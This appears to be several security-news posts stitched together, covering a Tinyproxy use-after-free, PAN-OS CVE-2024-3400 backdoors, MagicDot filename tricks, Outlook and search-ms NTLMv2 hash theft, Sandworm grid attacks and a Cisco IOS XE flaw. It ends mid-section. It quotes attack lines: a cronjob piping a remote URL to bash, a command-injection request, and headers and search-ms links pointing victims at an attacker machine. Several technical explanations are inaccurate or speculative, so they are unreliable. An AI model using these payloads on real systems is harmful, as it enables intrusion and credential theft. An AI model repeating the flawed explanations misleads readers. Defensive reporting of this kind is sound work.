Overview of the Vulnerability

Tinyproxy, a minimalist, open-source HTTP proxy, is designed for simplicity and efficiency, making it popular in environments where lightweight proxies are required. The vulnerability in question arises in the parsing of HTTP Connection headers—a fundamental component meant to specify which headers are persistent during an HTTP session.

According to the Cisco Talos vulnerability report (TALOS-2023-1889), specific versions of Tinyproxy, namely 1.11.1 and 1.10.0, are affected. The flaw exists in the remove_connection_headers function of Tinyproxy, where a use-after-free error can occur. This kind of software bug is particularly dangerous as it can lead to memory corruption, providing an attacker with a pathway for executing arbitrary code on the host machine.

Technical Breakdown

The issue arises when Tinyproxy handles HTTP headers that are supposed to be removed according to the Connection header’s directives. If the Connection or Proxy-Connection headers are manipulated by an attacker, it can lead to the reuse of previously freed memory. This use-after-free scenario is triggered as follows:

• Tinyproxy iterates over the headers specified in the Connection or Proxy-Connection header.
• Each specified header is removed from a key-value store (hashofheaders), and its memory is subsequently freed.
• However, due to an error in the management of these headers, the freed memory can be reused before the function completes, leading to memory corruption.

This vulnerability is particularly concerning because it can be exploited with a simple malformed HTTP request, making it easy for an attacker to leverage and potentially take over the system running Tinyproxy.

Exploitability and Impact

The CVSSv3 score for this vulnerability is 9.8 (Critical), which underscores its severity. An attacker does not need authenticated access to the target system, making it accessible to any malicious entity that can send HTTP requests to the affected proxy. The potential impacts include unauthorized access, data breaches, service disruption, and in severe cases, complete system compromise.

A use-after-free issue occurs when an application continues to use a memory reference (pointer) after it has freed the memory to which the pointer refers. This can lead to unpredictable behavior, including application crashes, data corruption, and the execution of arbitrary code.

Exploitation Example for CVE-2023-49606

Scenario Setup: Imagine a scenario where a server is running Tinyproxy version 1.11.1. This version is known to have a use-after-free vulnerability in the way it processes HTTP Connection headers.

Step-by-Step Exploitation:

1. Initial HTTP Request by Attacker:
   • The attacker crafts an HTTP request that includes specially designed Connection headers. The goal is to manipulate these headers to trigger the use-after-free condition.
   • Example HTTP request:
     • GET / HTTP/1.1
     • Host: vulnerable-proxy.com
     • Connection: keep-alive, maliciousHeader
     • maliciousHeader: freeThis
2. Processing the Request:
   • Tinyproxy receives the request and parses the headers. According to the specifications, it must remove headers listed in the Connection header after processing the request.
   • The remove_connection_headers function is called to handle this task.
3. Triggering the Use-After-Free:
   • During the processing, Tinyproxy removes maliciousHeader and frees the memory associated with it. However, due to a flaw in the proxy’s memory management, this freed memory could be reallocated for new data while still being referenced by the ongoing process.
   • Suppose the freed memory is quickly reallocated and filled with attacker-controlled data through another part of the application (or another request processed concurrently).
4. Exploiting the Freed Memory:
   • The attacker anticipates that Tinyproxy will access this freed (and now reallocated) memory again before the function completes. If this memory now contains executable code or data crafted by the attacker, it might be executed or wrongly used by the application.
   • For instance, if the memory location is used to store a function pointer, the attacker could overwrite this pointer with the address of their malicious code.
5. Executing Arbitrary Code:
   • When Tinyproxy tries to access the “freed” memory as part of its usual operations (e.g., to log details or continue processing headers), it inadvertently executes the code pointed to by the overwritten pointer.
   • This could allow the attacker to execute arbitrary code on the server running Tinyproxy, potentially giving them full control over the server.

Example of Malicious Impact:

• The attacker could install backdoors, exfiltrate confidential data, launch further attacks from the compromised server, or disrupt the server’s operations.

Mitigation and Response

As of the last update from Cisco Talos, there has been no official patch or maintenance release from the maintainers of Tinyproxy to correct this vulnerability. Organizations using Tinyproxy are advised to monitor their systems closely for unusual activity and implement additional safeguards until a patch is available. This may include:

• Deploying web application firewalls (WAFs) to filter out malicious HTTP headers.
• Isolating the proxy server from critical internal networks.
• Regularly updating all software to the latest versions where possible.

For users and administrators of Tinyproxy, understanding the technical mechanics of this vulnerability and staying vigilant about monitoring their network traffic is crucial. Immediate action is recommended to mitigate the risks associated with this critical vulnerability until a permanent fix is issued.

The post How Safe is Your TinyProxy? Step-by-Step Guide to Exploiting Tinyproxy’s Zero Day Vulnerability appeared first on Information Security Newspaper | Hacking News.

Overview of CVE-2024-3400

CVE-2024-3400 is categorized as an unauthenticated remote code execution vulnerability that could allow attackers to execute arbitrary code on the affected device without needing prior authentication. The flaw is particularly concerning because it can be exploited remotely, potentially giving attackers deep access to network defenses.

The CVE-2024-3400 vulnerability in Palo Alto Networks’ PAN-OS, targeted by Operation MidnightEclipse, has recently been leveraged for more sophisticated exploits, including the deployment of the UPSTYLE backdoor and the creation of malicious cronjobs. This detailed examination highlights the current scope of the attack, with insights derived from ongoing cybersecurity investigations.

Current Scope of the Attack

The exploitation of CVE-2024-3400 has evolved into a multi-faceted attack vector, primarily utilized by sophisticated threat actors. These actors employ a combination of direct command execution and advanced persistence mechanisms to maintain access and control over compromised systems. The UPSTYLE backdoor and associated cronjob activities represent two of the most critical components of this attack:

1. UPSTYLE Backdoor Deployment: In observed attacks, malicious actors have used crafted HTTP requests to exploit the vulnerability, subsequently running shell commands to download and execute the UPSTYLE backdoor script from remote servers. This script is often hosted on compromised web servers, with addresses like 144.172.79[.]92/update.py being involved in the distribution.
2. Cronjob Creation for Persistent Access: Furthering their control, attackers have also been observed creating cronjobs on compromised systems. These cronjobs are designed to automatically execute commands at regular intervals, fetching instructions from URLs like hxxp://172.233.228[.]93/policy | bash. This method ensures that even if the initial backdoor is detected and removed, the attackers retain a method of re-entry.

Technical Insights into UPSTYLE and Cronjob Activities

The technical execution of these components involves several sophisticated techniques:

• Command Execution: The initial exploit allows attackers to execute arbitrary shell commands remotely. This capability is used to install the UPSTYLE backdoor, modify system configurations, and set up new network routes to exfiltrate data securely.
• File Manipulation: Post-exploitation activities include modifying system files to hide the presence of malicious software. This often involves altering logs and other digital footprints that could be used to detect the intrusion.
• Automated Persistence: The cronjobs are set to run every minute, a tactic that provides the attackers with near-constant system access and the ability to push updates or new commands to the compromised system swiftly.

Active Exploitation and PoC Release

Reports from various cybersecurity firms, including Kroll and Zscaler, have highlighted active and opportunistic exploitation of this vulnerability by numerous threat actors. The ease of the exploit, compounded by the release of a PoC, has made CVE-2024-3400 a preferred target for malicious activities aimed at infiltrating and compromising enterprise networks.

Exploit details shared on platforms like GitHub reveal how attackers can utilize path traversal techniques combined with crafted HTTP requests to manipulate the firewall’s operating system, leading to unauthorized remote code execution. The ability of these attacks to bypass traditional security layers underscores the severity of the vulnerability.

Exploitation Mechanism: The exploitation of CVE-2024-3400 involves a series of sophisticated steps that allow attackers to bypass authentication and execute arbitrary code. Here are the key technical elements involved:

• Path Traversal: The initial vector for the attack utilizes a path traversal flaw in the web management interface. Attackers craft malicious HTTP requests that manipulate the file system to access areas that are normally restricted. This is typically achieved through inputs that include “../” sequences or similar methods to navigate the file system.
• Command Injection: After gaining access to restricted areas, attackers exploit command injection vulnerabilities. By inserting malicious commands into scripts or command lines that the system erroneously executes, attackers can initiate unauthorized actions on the device.
• Remote Code Execution (RCE): The culmination of the exploit allows attackers to run arbitrary code with the same privileges as the operating system of the firewall. This can lead to full system control, data manipulation, and initiation of further attacks from the compromised device.

Proof-of-Concept (PoC) Exploitation

The proof-of-concept that circulated in cybersecurity circles demonstrated a practical application of the aforementioned exploit techniques. The PoC is typically a script or set of instructions that exploit the vulnerability to prove its existence and potential for damage. In the case of CVE-2024-3400, the PoC details are as follows:

• Exploit Script: Publicly available scripts show how attackers can automatically perform the exploit using simple HTTP requests. These scripts are often shared on coding platforms like GitHub or cybersecurity forums.
• HTTP Request Manipulation: The PoC often includes examples of HTTP requests that induce the vulnerability. For example, an HTTP request might include a path traversal combined with a command injection like:vbnetCopy codePOST /ssl-vpn/hipreport.esp HTTP/1.1 Host: vulnerable-host Cookie: SESSID=../../../../../../var/cmd; command-to-execute
• Malicious Payloads: These payloads are crafted to perform specific actions on the compromised device, such as opening a reverse shell, modifying firewall rules, or exfiltrating confidential data.

Response from Palo Alto Networks

In response to the escalating threat, Palo Alto Networks has issued several security updates and detailed guidance for mitigation. The company has acknowledged the PoC and its implications, urging all users of the affected PAN-OS versions to update their systems immediately to the latest firmware.

Persistent Threats Despite Remediation

1. Persistent Rootkits: The researcher indicates that they have developed a payload that can survive not only operational resets but also factory resets. This type of malware, often referred to as a rootkit, embeds itself deeply within the system such that standard cleanup processes do not erase it. Rootkits can intercept and alter standard operating system processes to hide their presence, making detection and removal particularly challenging.
2. Post-Exploitation Persistence: There is mention of post-exploit persistence techniques that remain effective even after the device has been reset or firmware upgrades have been applied. This means that merely resetting the device to factory settings or updating its firmware isn’t sufficient to ensure that it is free from compromise. The persistence techniques developed can withstand these typical remedial actions.
3. Low Barrier to Entry: The researcher points out that creating such a persistent rootkit does not require advanced skills, suggesting that even less sophisticated attackers could deploy similar threats. This lowers the barrier to entry for executing highly effective and persistent attacks on vulnerable systems.
4. Physical Hardware Replacement Needed: Due to the rootkit’s resilience and deep integration into the system, the researcher recommends a full physical swap of the affected hardware or a thorough offline inspection and validation of the firmware and BIOS by a specialist. This is suggested as the only sure way to remove such entrenched malware, highlighting the severity and depth of the potential security breach.

Updated PSIRT Guidance

• Persistence Acknowledgement: The Palo Alto Networks Product Security Incident Response Team (PSIRT) has updated their guidance to acknowledge that malware can persist through updates and factory resets. This is an important admission that helps users understand the potential for ongoing risks even after applying what are typically considered comprehensive mitigation steps.
• Safety After Patching: While early patching is critical, the updated guidance suggests that simply having patched early does not guarantee safety against sophisticated attackers who may have enabled persistence mechanisms. Users who patched their systems immediately after the vulnerability was disclosed may still need to consider additional measures to ensure their systems are secure.

Recommendations

Given the nature of this persistent threat, organizations and individuals using affected Palo Alto Networks products should consider the following actions:

1. Physical Replacement: Where feasible, replace potentially compromised hardware to eliminate any chance of lingering threats.
2. Specialist Review: Engage with cybersecurity specialists to conduct thorough offline checks of the firmware and BIOS to ensure no elements of the rootkit or other malware remain.
3. Enhanced Monitoring: Implement enhanced monitoring and logging to detect any signs of rootkit activity or other unusual behaviors that indicate a compromised system.
4. Comprehensive Security Practices: Continue applying security best practices, including regular updates, strict access controls, and frequent security audits to identify and mitigate threats.

The exploitation of CVE-2024-3400 has significant implications for network security, particularly for enterprises that rely on Palo Alto firewalls to protect their critical infrastructure. The vulnerability exposes these networks to potential espionage, data breaches, and other malicious activities if not addressed promptly.

Security experts recommend implementing a multi-layered defense strategy that includes regular updates, monitoring for unusual network activity, and employing advanced threat detection solutions. Additionally, companies are advised to review and strengthen their incident response plans to quickly react to any breaches that might occur.

The discovery and subsequent exploitation of CVE-2024-3400 highlight ongoing challenges in cybersecurity defense mechanisms, particularly in widely used infrastructure components like firewalls. It also stresses the importance of timely patches and the dangers posed by publicly available exploit codes. As the digital landscape evolves, so too does the necessity for robust, proactive security measures to safeguard critical data and systems from emerging cyber threats.

The post Eternal Malware: CVE-2024-3400 Rootkits Persist Through Palo Alto Firewalls Updates and Resets appeared first on Information Security Newspaper | Hacking News.

Or Yair and his team found that the MagicDot paths—an area seemingly harmless and known but overlooked—posed significant security risks. The vulnerabilities included allowing malicious actors to hide files and processes, manipulate file restoration processes, and make malware appear as verified software on task managers and process explorers. The most concerning part was that these actions could be executed without the need for administrative rights, essentially offering rootkit capabilities to any unprivileged user.

The DOS-to-NT path conversion process in Windows is a fundamental aspect of how the operating system handles file paths. This process can be complex due to the legacy support for DOS-style paths and the current NT (New Technology) file system paths used by modern Windows. Understanding this conversion process is crucial for grasping how vulnerabilities might arise.

DOS Paths

DOS paths are traditionally shorter and have limitations compared to NT paths:

• Length: DOS paths typically support a maximum of 260 characters.
• Format: They use a simple structure, generally starting with a drive letter followed by a colon and a backslash, then the directory names, separated by backslashes (e.g., C:\Program Files\Example).
• Character Set: DOS paths are limited to upper-case letters with no spaces or special characters beyond underscores.

NT Paths

NT paths are used in modern Windows operating systems and support more complex features:

• Length: They can exceed the classic 260-character limit of DOS paths.
• Format: NT paths can include networking setups and subsystem links. They often start with \\?\ for local paths or \\?\UNC\ for network paths to bypass the character limit (e.g., \\?\C:\Program Files\Example).
• Character Set: NT paths allow for a wider range of characters in file and directory names, including spaces and mixed case.

Conversion Process

The conversion from a DOS path to an NT path involves several steps that accommodate these differences. Here’s a simple example to illustrate:

Example of Conversion

DOS Path: C:\PROGRA~1\Example

• This is a shortened DOS path where PROGRA~1 might be the shortened version of Program Files.

Converted NT Path: \\?\C:\Program Files\Example

• The DOS path is expanded to its full NT format, including the special prefix \\?\ that tells Windows to handle this as an extended-length path.

Vulnerabilities

The conversion process is prone to vulnerabilities, especially if malicious actors manipulate path names by inserting special characters or irregular spacing. For example:

• Manipulated DOS Path: C:\PROGRA~1\Example\.. \.. \badfile.exe
• In this manipulated path, the use of dots (..) and irregular spacing can trick the system into navigating up the directory tree unexpectedly, potentially accessing or executing a file (badfile.exe) from an unintended location.

The vulnerabilities uncovered by the “MagicDot” research, particularly focusing on the Windows DOS-to-NT path conversion, highlight significant security risks including Remote Code Execution (RCE) and Elevation of Privilege (EoP). These vulnerabilities stem from the system’s mishandling of file paths, where the inclusion of special characters like trailing dots and spaces can lead to unexpected and potentially harmful behavior. Here’s a breakdown of how these specific vulnerabilities manifest:

Remote Code Execution (RCE)

Overview: Remote Code Execution occurs when an attacker is able to execute arbitrary code on another machine over a network, typically bypassing security mechanisms to gain control of the targeted system.

MagicDot Exploitation Path:

• File Name Manipulation: An attacker can craft file names with trailing dots and spaces that are misinterpreted by some parts of the Windows OS but are treated as valid executable paths by others.
• Misleading Application and Services: For example, a script or application might download a file named safe_script.ps1. intending to run a PowerShell script. The system, however, executes a malicious script named safe_script.ps1 (without the dot) that the attacker previously placed on the system.
• Triggering Execution: This can happen through web downloads, email attachments, or other means where the user or an automated system executes what appears to be a benign file, leading to the execution of malicious code.

Elevation of Privilege (EoP)

Overview: Elevation of Privilege occurs when an attacker gains higher access rights than intended, typically moving from a lower privilege level to a higher one, such as obtaining administrative rights from a normal user account.

MagicDot Exploitation Path:

• Directory and File Confusion: By creating directories or files with trailing spaces or dots, an attacker might confuse system processes about the identity and attributes of a file or directory. For instance, manipulating file paths could trick the system into executing a file from an unprivileged context as if it has administrative privileges.
• Bypassing Security Controls: These path manipulations can allow malware to be placed in sensitive directories or execute operations that normally require higher privileges. For example, an executable might be placed in a system directory disguised with a trailing dot, misleading system defenses that check the integrity of filenames without considering such anomalies.
• Exploiting System Processes: If a system process automatically processes files from a directory (like a temp directory) and executes files supposed to be logs or non-executable data, the misinterpreted paths can lead to unauthorized administrative actions being performed.

The most critical of these vulnerabilities was logged under CVE-2023-42757, which, as confirmed by MITRE and Microsoft, pertains to an exploitable flaw that will be documented in a forthcoming CVE entry.

The Exploit Technique

The MagicDot exploit takes advantage of the way Windows trims trailing dots and spaces from file names during its DOS-to-NT path conversion. By carefully crafting file names that include these characters, attackers can create files that appear benign to certain processes while being malicious in nature. Here’s a detailed step-by-step example of how such an exploit might be executed:

Example of MagicDot Exploit

1. Creating the Malicious File:
   • An attacker creates a file named important.txt... on a system. While the file name is displayed as important.txt in most legacy interfaces (due to DOS conventions trimming the trailing dots), the NT file system retains the full name including the dots.
2. Exploitation:
   • The attacker convinces a system process or an application to interact with important.txt, intending to access the benign-looking file.
   • Due to the path conversion process, some applications that do not trim trailing spaces or dots may end up interacting with important.txt..., which is actually a different, malicious file controlled by the attacker.
3. Bypassing Security Measures:
   • By using this naming discrepancy, the malicious file can bypass security measures that might not recognize it as a threat due to its seemingly innocuous name (as seen by most legacy applications).
4. Impact:
   • This kind of path manipulation could allow the attacker to execute arbitrary code, replace system files, intercept data, or cause other unauthorized actions, all while avoiding detection by security tools that only scan for known dangerous paths or file names.

Rootkits are malicious software designed to gain unauthorized access to a computer system while remaining hidden from users and security programs. They often provide the attacker with administrator-level access, allowing them to alter system configurations, hide malicious activity, and maintain persistent access. Rootkit capabilities vary, but they typically include functionalities that manipulate core system processes and structures to conceal their presence.

Technical Details on Rootkit Capabilities

Rootkits interact deeply with the operating system, often at the kernel level, to avoid detection. They can intercept and alter system calls, hide specific files and directory entries, and mask network connections and processes. Here’s how rootkit capabilities can be understood through a conceptual example:

Example: File and Process Concealment Rootkit

1. Kernel-Level Manipulation:
   • The rootkit injects itself into the kernel or operates as a kernel module, giving it high-level control over system functions.
2. File Concealment:
   • Objective: Make certain files invisible to system tools and users.
   • Method: The rootkit intercepts system calls that list directory contents (e.g., readdir on Linux or NtQueryDirectoryFile on Windows). It modifies the results to exclude specific files or directories from being displayed.
3. Process Concealment:
   • Objective: Hide certain processes to avoid detection by task managers or monitoring software.
   • Method: Similar to file concealment, the rootkit intercepts system calls related to process enumeration (e.g., NtQuerySystemInformation on Windows). It then filters out any information related to its own processes or other specified malicious processes.
4. Example Scenario:
   • An attacker installs a rootkit on a system that hides a malicious process named badprocess.exe. The rootkit is programmed to intercept calls to NtQuerySystemInformation, used by Windows Task Manager to list running processes.
   • When Task Manager runs, it queries the system for a list of all processes. However, each time this query includes badprocess.exe, the rootkit removes this entry from the results.
   • As a result, badprocess.exe operates on the system without appearing in the task list, effectively invisible to both users and most antivirus software.

Unprivileged Rootkit-like Capabilities Through MagicDot Paths

Rootkits traditionally require privileged access to a system to manipulate core processes and remain undetected. However, the MagicDot findings illustrate that attackers can achieve similar outcomes—such as concealing malicious activities and manipulating system processes—without needing such elevated privileges. This is done through clever manipulation of file path anomalies allowed by the system.

Key Capabilities Demonstrated:

1. File and Directory Masking:
   • By appending dots (.) and spaces to filenames, attackers can create files or directories that are not properly recognized or are misinterpreted by certain parts of the operating system. This allows malicious files to be hidden in plain sight, effectively invisible to standard file management tools and even some antivirus software.
2. Misleading System and Applications:
   • The anomalies in handling trailing dots and spaces can mislead applications and system processes about the true nature or existence of files. For example, a file named example.txt... might be shown and treated as example.txt in some interfaces, while it is a separate and potentially harmful file in reality.
3. Bypassing Security Mechanisms:
   • These path manipulations can be used to bypass security mechanisms that rely on file path integrity checks. By exploiting the discrepancies between how file paths are displayed and stored, attackers can smuggle in or execute malicious payloads unnoticed.
4. Persistent Access and Control:
   • Similar to traditional rootkits, files created using MagicDot techniques can persist on the system and perform unauthorized activities without being detected. These files can continually interfere with system operations or monitor user actions covertly.

Example Scenario:

Suppose an attacker wants to execute a malicious script without detection. They might create a file named update.bat... on a system. Here’s how they could leverage the MagicDot vulnerability:

• Creation: The attacker uploads update.bat... via a compromised email attachment or through a web download.
• Execution Ambiguity: The file might be displayed as update.bat in some administrative tools, leading system administrators to believe it’s a legitimate batch file for updates.
• System Manipulation: When executed (either by an auto-run setup or manual execution), the system runs the malicious update.bat..., believing it to be benign, allowing the attacker to execute a payload that could steal data, install further malware, or create backdoors.

Implications for Software Vendors

Upon discovering such vulnerabilities, researchers typically engage in a responsible disclosure process with the vendor, in this case likely Microsoft. This includes privately informing Microsoft of the vulnerabilities, allowing them time to verify and develop a fix before any public disclosure. Microsoft would then acknowledge the issue, investigate, and replicate the findings, followed by developing and releasing a patch. They would also issue a detailed advisory that includes mitigation guidance and a CVE number for tracking. The findings from SafeBreach Labs underscore a crucial reminder for software developers—known issues, even if longstanding and seemingly minor, can pose serious security risks if left unaddressed. This case study emphasizes the need for thorough assessments and updates to existing software infrastructures to prevent potential exploits.

The study not only exposes specific vulnerabilities but also proposes actionable insights for software vendors on maintaining and enhancing security protocols. As vulnerabilities like these are widespread and not limited to a single software product, the implications are broad and warrant a systemic review by all software vendors to safeguard against similar exploits.

The post Hacking with MagicDots: Exploiting Dots & Spaces in Filenames/Pathnames for Permanent Admin Rights appeared first on Information Security Newspaper | Hacking News.

What is CVE-2023-35636?

CVE-2023-35636 is an exploit targeting the calendar sharing function in Microsoft Outlook. By adding two specific headers to an email, attackers can direct Outlook to share content and contact a designated machine, thereby intercepting an NTLM v2 hash.

Understanding NTLM v2

NTLM v2 is a cryptographic protocol used by Microsoft Windows for authenticating users to remote servers. Despite being more secure than its predecessor, NTLM v2 is still vulnerable to offline brute-force and authentication relay attacks. The protocol involves transporting passwords as hashes, which, without salting, are password equivalent.

Exploitation of NTLM v2 Hashes

Attackers can use NTLM v2 hashes in two primary ways:

1. Offline brute-force attacks: Here, attackers access a copy of the NTLM v2 hash and generate all possible passwords to find a match.
2. Authentication relay attacks: This involves intercepting an NTLM v2 authentication request and forwarding it to a different server.

Leaking NTLM v2 Hashes Using Outlook

The Outlook vulnerability lies in its calendar sharing feature. By crafting an email with specific headers, attackers can redirect the hashed password to their machine.

The Outlook Exploit:

1. “Content-Class” = “Sharing” — Indicates the email contains sharing content.
2. “x-sharing-config-url” = \\(Attacker machine)\a.ics — Directs the victim’s Outlook to the attacker’s machine.

Leaking NTLM v2 Hashes Using URI Handlers and WPA

URI handlers in operating systems allow applications to register for specific URI types. Windows Performance Analyzer (WPA) uses a URI handler “WPA://” by default. Attackers can exploit this to authenticate using NTLM v2 over the open web.

The WPA Exploit

The exploit involves a simple payload that directs the victim’s machine to access the attacker’s machine via SMB, potentially leaking the NTLM v2 hash.

Attack Scenario

Step 1: Crafting the Malicious Email

1. Attacker’s Preparation: The attacker prepares an email with two specific headers:
   • "Content-Class" = "Sharing": This header tells Outlook that the email contains sharing content.
   • "x-sharing-config-url" = \\[Attacker's Machine]\a.ics: This header points the victim’s Outlook to a file (a.ics) hosted on the attacker’s machine.

Step 2: Victim Receives the Email

1. Victim’s Action: The victim receives the email and interacts with it (e.g., clicks on a link or button in the email that says “Open this iCal”).
2. Outlook’s Response: Due to the headers in the email, Outlook attempts to retrieve the a.ics file from the attacker’s machine.

Step 3: Intercepting the NTLM v2 Hash

1. Hash Transmission: When Outlook tries to access the file on the attacker’s machine, it sends an NTLM v2 hash of the user’s password for authentication.
2. Attacker’s Interception: The attacker captures this hash.

Step 4: Exploiting the Hash

1. Offline Brute-Force Attack: The attacker uses the captured hash to perform an offline brute-force attack. This involves trying various password combinations against the hash until a match is found.
2. Gaining Unauthorized Access: Once the correct password is determined, the attacker can use it to access the victim’s account or system.

Example

Imagine a scenario where Alice, an employee at a corporation, receives an email that appears to be a calendar invite from a colleague. The email contains a button saying “Open this iCal”. Unbeknownst to Alice, the email is actually from an attacker and is crafted to exploit CVE-2023-35636.

When Alice clicks the button, her Outlook tries to fetch the a.ics file from what she believes is her colleague’s machine but is actually the attacker’s server. During this process, her computer sends an NTLM v2 hash of her password to the attacker’s server for authentication.

The attacker, now in possession of Alice’s NTLM v2 hash, uses a powerful computer to perform an offline brute-force attack. Eventually, the attacker discovers Alice’s actual password and gains unauthorized access to her corporate account, potentially leading to data theft or further network compromise.

Leaking NTLM v2 Hashes Using Windows File Explorer

How a similar attack to the Outlook vulnerability can be executed using Windows File Explorer. This involves exploiting the “subquery” and “crumb” parameters in the URI handler “search-ms” of Windows File Explorer.

Background: Windows File Explorer and URI Handlers

Windows File Explorer, known as explorer.exe, is a file management application in Windows. It includes a feature called URI handlers, which allows it to process special types of links (search-ms://) that can trigger specific actions within the File Explorer.

Attack Scenario Using Windows File Explorer

Step 1: Crafting the Malicious Link

1. Attacker’s Preparation: The attacker creates a malicious link using the search-ms URI scheme. This link includes special parameters that will direct the victim’s File Explorer to the attacker’s machine. There are two methods to do this:
   • Using the “subquery” parameter: search-ms://query=poc&subquery=\\[Attacker's Machine]\poc.search-ms
   • Using the “crumb” parameter: search-ms://query=poc&crumb=location:\\[Attacker's Machine]

Step 2: Delivering the Malicious Link

1. Distribution: The attacker sends this link to the victim via email, social media, or other means. The link might be disguised as a legitimate search query or file request.

Step 3: Victim Interacts with the Link

1. Victim’s Action: The victim clicks on the link, believing it to be legitimate.
2. File Explorer’s Response: The victim’s File Explorer attempts to execute the search or access the file specified in the link, which points to the attacker’s machine.

Step 4: Intercepting the NTLM v2 Hash

1. Hash Transmission: To access the resource on the attacker’s machine, the victim’s system sends an NTLM v2 hash of the user’s password for authentication.
2. Attacker’s Interception: The attacker captures this hash from their machine.

Step 5: Exploiting the Hash

1. Offline Brute-Force Attack: The attacker uses the captured hash to perform an offline brute-force attack, attempting to find the actual password.
2. Gaining Unauthorized Access: If successful, the attacker can use the password to gain unauthorized access to the victim’s system or network.

Example

Consider a scenario where Bob, a user, receives an email with a link that appears to direct him to a useful file search on his company’s network. The link is actually a malicious search-ms URL crafted by an attacker. When Bob clicks the link, his File Explorer tries to execute the search, which unknowingly points to the attacker’s server.

As File Explorer attempts to access the resource, it sends an NTLM v2 hash of Bob’s password for authentication. The attacker captures this hash and then uses various tools to crack the password offline. Once the password is obtained, the attacker can potentially access Bob’s computer or other resources within the company’s network.

This attack scenario demonstrates the potential vulnerability within Windows File Explorer when handling specially crafted search-ms URLs. It highlights the importance of being cautious with links, even those that seem to be internal file or search requests, and the need for robust security measures to protect against such NTLM hash theft attacks. Varonis Threat Labs also discovered vulnerabilities in Windows File Explorer’s process, explorer.exe, particularly in the “subquery” and “crumb” parameters of the URI handler “search-ms”.

The Windows File Explorer Exploits

1. Using the “subquery” parameter: This method directs explorer.exe to connect to a remote SMB, leaking the NTLM v2 hash.
2. Using the “crumb” parameter: Similar to the “subquery” exploit, this method also leads to the theft of the hashed password.

Microsoft’s Response

Microsoft has acknowledged the Outlook exploit as an important CVE-2023-35636 and released a patch on December 12, 2023. The vulnerabilities for WPA and Windows File Explorer were closed due to “moderate severity.”

Protecting Against NTLM v2 Attacks

To safeguard against these vulnerabilities, it is recommended to:

• Enable SMB signing.
• Block outgoing NTLM v2, especially on Windows 11 (25951) and later.
• Prefer Kerberos authentication and block NTLM v2 at network and application levels.

Unpatched systems remain at risk, and it’s crucial to update and apply security measures to prevent potential exploits.

The post How to steal Windows password via Outlook email exploiting vulnerabilities in Windows Performance Analyzer (WPA) and File Explorer appeared first on Information Security Newspaper | Hacking News.

1. Initial Access

• Example: A phishing email is sent to an employee in the OT/ICS environment. The email contains a seemingly harmless document that, when opened, executes a PowerShell script (a native Windows tool) to create a backdoor.

2. Lateral Movement

• Example: Once inside the network, attackers might use legitimate system administration tools like Windows Management Instrumentation (WMI) or Remote Desktop Protocol (RDP) to move laterally across the network, searching for critical OT/ICS components.

3. Elevation of Privileges

• Example: Attackers might use built-in tools like Netstat to identify security software or firewall settings and then use other native scripts or commands to disable these defenses, or to elevate their access privileges within the system.

4. Discovery and Information Gathering

• Example: Tools like Tasklist or Systeminfo (native to Windows) are used to gather information about the system, such as running processes, installed software, or network configurations relevant to the OT/ICS environment.

5. Exploitation and Manipulation

• Example: In an ICS environment, attackers might use standard industrial communication protocols like Modbus or DNP3 (which are legitimate and essential for normal operations) to send malicious commands to control systems, potentially disrupting physical processes like power generation or water treatment.

6. Persistence and Exfiltration

• Example: Attackers could use standard data transfer tools like FTP or even Windows BITS (Background Intelligent Transfer Service) to exfiltrate stolen data, or to maintain persistence by regularly updating malware or downloading additional tools.

7. Cleanup

• Example: To erase their tracks, attackers might use native cleanup tools or scripts to delete logs or any evidence of their activities, making detection and forensics much more difficult.

In late 2022, a significant cyber-physical incident occurred in Ukraine, attributed to the Russia-linked threat actor Sandworm. This event targeted Ukrainian critical infrastructure and utilized a multi-event cyber attack strategy, incorporating innovative techniques to impact industrial control systems (ICS) and operational technology (OT). The Sandworm actor employed OT-level living-off-the-land (LotL) techniques, likely causing a substation’s circuit breakers to trip and resulting in an unplanned power outage. This outage coincided with mass missile strikes across Ukraine’s critical infrastructure. Additionally, Sandworm executed a second disruptive event by deploying a new variant of CADDYWIPER malware in the victim’s IT environment.

This attack exemplifies the latest advancements in Russia’s cyber-physical attack capabilities, particularly visible since Russia’s invasion of Ukraine. The techniques used indicate a maturing offensive OT arsenal, capable of identifying novel OT threat vectors, developing new capabilities, and leveraging various types of OT infrastructure for attacks. Utilizing LotL techniques likely reduced the time and resources required for the cyber-physical attack. Although the initial intrusion point remains undetermined, the rapid development of the OT component of this attack suggests the actor’s ability to swiftly create similar capabilities against other OT systems globally.

Sandworm, active since at least 2009, is a versatile threat actor conducting espionage, influence, and attack operations, primarily supporting Russia’s Main Intelligence Directorate (GRU). The group’s primary focus has been Ukraine, where it has orchestrated disruptive and destructive attacks using wiper malware, especially during Russia’s re-invasion in 2022. However, Sandworm’s activities extend globally, underlining the Russian military’s extensive ambitions and interests in various regions. The group’s global threat activity and novel OT capabilities necessitate proactive measures from OT asset owners to mitigate potential risks.

As per mandiant research, the 2022 intrusion began or prior to June 2022, culminating in two disruptive events on October 10 and 12. Sandworm accessed the OT environment via a hypervisor hosting a SCADA management instance for a substation, potentially having SCADA system access for up to three months. On October 10, Sandworm used an optical disc (ISO) image, “a.iso,” to execute a native MicroSCADA binary, likely for malicious control commands to switch off substations. The attackers, got into the operational technology (OT) system through a key piece of software (a hypervisor) that managed the control system (SCADA) of a power substation. This means they had access to the system that controls how the power substation works. For up to three months, they could have been inside this system without being detected. On October 10, they used a special file (an ISO image named “a.iso”) to run a command in the control system that was likely intended to turn off power substations.

This case underscores the evolving nature of cyber threats, particularly in critical infrastructure sectors. The increasing sophistication and rapid development of such attacks highlight the need for enhanced cybersecurity measures, continuous monitoring, and preparedness against novel and complex cyber threats in OT and ICS environments.

In OT/ICS environments, such LotL attacks are particularly concerning because they:

• Are harder to detect due to the use of legitimate tools.
• Can cause significant physical and operational damage.
• May bypass traditional security measures that don’t account for malicious use of native tools.

Defending against such attacks requires a combination of robust cybersecurity practices, including employee training, network segmentation, constant monitoring for anomalous behaviors, and regular updating and patching of all systems.

The post How Living-off-the-land (LotL) technique is used to hack into power grids & cause power outages appeared first on Information Security Newspaper | Hacking News.

The Vulnerability: CVE-2023-20198

A new, critical zero-day vulnerability has emerged, labeled as CVE-2023-20198. This vulnerability, with a maximum severity rating of CVSS 10, predominantly affects devices running the Cisco IOS XE software and is currently without a patch, leaving systems vulnerable to potential exploits. The flaw can be exploited by an unauthenticated attacker to create a user account with the highest privilege level, leading to unauthorized system access.

Exploitation in the Wild
Attackers have already begun exploiting this vulnerability in the wild, utilizing it to deliver malicious implants. Organizations using the affected devices are advised to apply mitigation measures promptly to defend against these exploits.

Affected Devices and Systems
